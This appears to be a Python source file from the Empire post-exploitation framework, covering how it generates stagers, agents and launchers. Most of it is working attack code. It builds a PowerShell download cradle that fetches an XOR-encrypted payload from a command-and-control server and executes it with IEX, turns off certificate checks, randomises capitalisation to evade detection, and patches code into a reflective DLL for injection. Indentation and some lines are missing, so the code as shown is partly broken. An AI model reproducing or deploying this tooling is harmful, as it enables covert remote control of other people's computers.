
405 lines
15 KiB

Stager handling functionality for Empire.
import fnmatch
import imp
import http
import helpers
import encryption
import os
import base64
class Stagers:
def __init__(self, MainMenu, args):
self.mainMenu = MainMenu
# pull the database connection object out of the main menu
self.conn = self.mainMenu.conn
self.args = args
# stager module format:
# [ ("stager_name", instance) ]
self.stagers = {}
# pull out the code install path from the database config
cur = self.conn.cursor()
cur.execute("SELECT install_path FROM config")
self.installPath = cur.fetchone()[0]
cur.execute("SELECT default_profile FROM config")
self.userAgent = (cur.fetchone()[0]).split("|")[1]
# pull out staging information from the main menu
self.stage0 = self.mainMenu.stage0
self.stage1 = self.mainMenu.stage1
self.stage2 = self.mainMenu.stage2
def load_stagers(self):
Load stagers from the install + "/lib/stagers/*" path
rootPath = self.installPath + 'lib/stagers/'
pattern = '*.py'
for root, dirs, files in os.walk(rootPath):
for filename in fnmatch.filter(files, pattern):
filePath = os.path.join(root, filename)
# extract just the module name from the full path
stagerName = filePath.split("/lib/stagers/")[-1][0:-3]
# instantiate the module and save it to the internal cache
self.stagers[stagerName] = imp.load_source(stagerName, filePath).Stager(self.mainMenu, [])
def set_stager_option(self, option, value):
Sets an option for all stagers.
for name, stager in self.stagers.iteritems():
for stagerOption,stagerValue in stager.options.iteritems():
if stagerOption == option:
stager.options[option]['Value'] = str(value)
def generate_stager(self, server, key, encrypt=True, encode=False):
Generate the PowerShell stager that will perform
key negotiation with the server and kick off the agent.
TODO: variable name replacement to change up transport size
... other PowerShell obfuscation techniques?
http://desktoplibrary.livelink-experts.com/obfuscate-powershell-user-manual ?
# read in the stager base
f = open(self.installPath + "/data/agent/stager.ps1")
stager = f.read()
# make sure the server ends with "/"
if not server.endswith("/"): server += "/"
# patch the server and key information
stager = stager.replace("REPLACE_SERVER", server)
stager = stager.replace("REPLACE_STAGING_KEY", key)
stager = stager.replace("index.jsp", self.stage1)
stager = stager.replace("index.php", self.stage2)
randomizedStager = ""
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
randomizedStager += line
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
# return an encrypted version of the stager ("normal" staging)
return encryption.xor_encrypt(randomizedStager, key)
# otherwise return the case-randomized stager
return randomizedStager
def generate_stager_hop(self, server, key, encrypt=True, encode=True):
Generate the PowerShell stager for hop.php redirectors that
will perform key negotiation with the server and kick off the agent.
# read in the stager base
f = open(self.installPath + "./data/agent/stager_hop.ps1")
stager = f.read()
# patch the server and key information
stager = stager.replace("REPLACE_SERVER", server)
stager = stager.replace("REPLACE_STAGING_KEY", key)
stager = stager.replace("index.jsp", self.stage1)
stager = stager.replace("index.php", self.stage2)
randomizedStager = ""
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
randomizedStager += line
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
# return an encrypted version of the stager ("normal" staging)
return encryption.xor_encrypt(randomizedStager, key)
# otherwise return the case-randomized stager
return randomizedStager
def generate_agent(self, delay, jitter, profile, killDate, workingHours, lostLimit):
Generate "standard API" functionality, i.e. the actual agent.ps1 that runs.
This should always be sent over encrypted comms.
f = open(self.installPath + "./data/agent/agent.ps1")
code = f.read()
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
b64DefaultPage = base64.b64encode(http.default_page())
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.asp,/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultPage = ""', '$DefaultPage = "'+b64DefaultPage+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if workingHours != "":
code = code.replace('$WorkingHours,', "$WorkingHours = '" + str(workingHours) + "',")
return code
# def generate_agent(self, sessionID):
# """
# Generate the agent code for a particulare sessionID.
# Used for on-disk persistence without needing staging.
# Note: only use on reboot persistence, otherwise you'll get two agents running :)
# """
# if not self.mainMenu.agents.is_agent_present(sessionID):
# print helpers.color("[!] Invalid sessionID specified for agent generation.")
# return ""
# f = open(self.installPath + "./data/agent/agent.ps1")
# code = f.read()
# f.close()
# # strip out comments and blank lines
# code = helpers.strip_powershell_comments(code)
# # get the real sessionID based on the ID/name
# agentSessionID = self.mainMenu.agents.get_agent_id(sessionID)
# # get all agent information
# agentInfo = self.mainMenu.agents.get_agent(agentSessionID)
# # get (delay, jitter, profile, killDate, workingHours)
# sessionID = agentInfo[1]
# listener = agentInfo[2]
# delay = agentInfo[4]
# jitter = agentInfo[5]
# sessionKey = agentInfo[14]
# servers = agentInfo[19]
# uris = agentInfo[20]
# ua = agentInfo[22]
# headers = agentInfo[23]
# killDate = agentInfo[25]
# workingHours = agentInfo[26]
# profile = uris + "|" + ua
# if not headers == "":
# profile += "|" + headers
# # patch in the delay, jitter, and comms profile, etc.
# code = code.replace('$SessionID,', "$SessionID = \"%s\"," %(sessionID))
# code = code.replace('$SessionKey,', "$SessionKey = \"%s\"," %(sessionKey))
# code = code.replace('$Servers,', "$Servers = \"@('%s')\"," %(listener))
# code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
# code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
# code = code.replace('$Profile = "/admin/get.php,/news.asp,/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
# # patch in the killDate and workingHours if they're specified
# if killDate != "":
# code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
# if workingHours != "":
# code = code.replace('$WorkingHours,', "$WorkingHours = '" + str(workingHours) + "',")
# return code
def generate_launcher_uri(self, server, encode=True, pivotServer="", hop=False):
Generate a base launcher URI.
This is used in the management/psinject module.
if hop:
# generate the base64 encoded information for the hop translation
checksum = "?" + helpers.encode_base64(server + "&" + self.stage0)
# get a valid staging checksum uri
checksum = self.stage0
if pivotServer != "":
checksum += "?" + helpers.encode_base64(pivotServer)
if server.count("/") == 2 and not server.endswith("/"):
server += "/"
return server + checksum
def generate_launcher(self, listenerName, encode=True, userAgent="default", proxy="default", proxyCreds="default"):
Generate the initial IEX download cradle with a specified
c2 server and a valid HTTP checksum.
listenerName -> a name of a validly registered listener
userAgent -> "default" uses the UA from the default profile in the database
"none" sets no user agent
any other text is used as the user-agent
proxy -> "default" uses the default system proxy
"none" sets no proxy
any other text is used as the proxy
# if we don't have a valid listener, return nothing
if not self.mainMenu.listeners.is_listener_valid(listenerName):
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
# extract the staging information from this specified listener
(server, stagingKey, pivotServer, hop) = self.mainMenu.listeners.get_stager_config(listenerName)
# if UA is 'default', use the UA from the default profile in the database
if userAgent.lower() == "default":
userAgent = self.userAgent
# get the launching URI
URI = self.generate_launcher_uri(server, encode, pivotServer, hop)
stager = helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
stager += "$u='"+userAgent+"';"
if "https" in URI:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != "none" or proxy.lower() != "none":
if userAgent.lower() != "none":
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "'User-Agent',$u);"
if proxy.lower() != "none":
if proxy.lower() == "default":
stager += helpers.randomize_capitalization("$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;")
# TODO: implement form for other proxy
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
# TODO: implement form for other proxy credentials
# the stub to decode the encrypted stager download by XOR'ing with the staging key
stager += helpers.randomize_capitalization("$K=")
stager += "'"+stagingKey+"';"
stager += helpers.randomize_capitalization("$i=0;[char[]]$b=([char[]]($wc.DownloadString(\"")
stager += URI
stager += helpers.randomize_capitalization("\")))|%{$_-bXor$k[$i++%$k.Length]};IEX ($b-join'')")
# base64 encode the stager and return it
if encode:
return helpers.powershell_launcher(stager)
# otherwise return the case-randomized stager
return stager
def generate_hop_php(self, server, resources):
Generates a hop.php file with the specified target server
and resource URIs.
# read in the hop.php base
f = open(self.installPath + "/data/misc/hop.php")
hop = f.read()
# make sure the server ends with "/"
if not server.endswith("/"): server += "/"
# patch in the server and resources
hop = hop.replace("REPLACE_SERVER", server)
hop = hop.replace("REPLACE_RESOURCES", resources)
return hop
def generate_dll(self, poshCode, arch):
Generate a PowerPick Reflective DLL to inject with base64-encoded
stager code.
#read in original DLL and patch the bytes based on arch
if arch.lower() == "x86":
origPath = self.installPath + "/data/misc/ReflectivePick_x86_orig.dll"
origPath = self.installPath + "/data/misc/ReflectivePick_x64_orig.dll"
if os.path.isfile(origPath):
dllRaw = ''
with open(origPath, 'rb') as f:
dllRaw = f.read()
replacementCode = helpers.decode_base64(poshCode)
# patch the dll with the new PowerShell code
searchString = (("Invoke-Replace").encode("UTF-16"))[2:]
index = dllRaw.find(searchString)
print "index:",index
dllPatched = dllRaw[:index]+replacementCode+dllRaw[(index+len(replacementCode)):]
return dllPatched
print helpers.color("[!] Original .dll for arch "+arch+" does not exist!")